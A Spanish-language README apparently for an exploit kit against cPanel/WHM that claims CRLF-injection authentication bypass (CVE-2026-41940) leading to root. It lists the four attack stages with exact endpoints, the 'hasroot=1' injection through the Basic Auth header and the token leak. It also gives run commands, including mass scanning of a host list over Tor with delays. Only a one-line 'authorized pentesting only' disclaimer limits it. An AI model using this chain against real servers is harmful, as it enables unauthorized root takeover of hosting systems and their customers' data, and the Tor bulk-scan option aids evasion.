
cPanel/WHM CVE-2026-41940 exploit de inyección CRLF para evasión de autenticación
Kit de pruebas de seguridad para cPanel/WHM. Implementa el bypass de autenticación por inyección CRLF CVE-2026-41940 y la escalada de privilegios post-explotación.
| Script | Propósito |
|---|---|
cpanel_exploit.py | CVE-2026-41940: inyección CRLF → bypass de autenticación WHM → acceso root |
Tipo: Inyección CRLF → Bypass de autenticación → RCE como root
Afecta: cPanel/WHM < versiones parcheadas
Ataque: La inyección CRLF pre-autenticación en el encabezado Basic Auth inyecta en el archivo de sesión del lado del servidor, elevando una sesión no autenticada a root de WHM.
hasroot=1Etapa 1: POST /login/?login_only=1 → genera sesión pre-autenticación
Etapa 2: GET / Authorization:Basic <CRLF> → inyecta hasroot=1, filtra token cpsess
Etapa 3: GET /scripts2/listaccts → activa el gadget de propagación de caché de sesión
Etapa 4: GET /cpsess[TOKEN]/json-api/version → HTTP 200 + versión = ACCESO ROOT
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only # solo verificación CRLF, sin escalada de privilegios
Solo para pruebas de penetración autorizadas.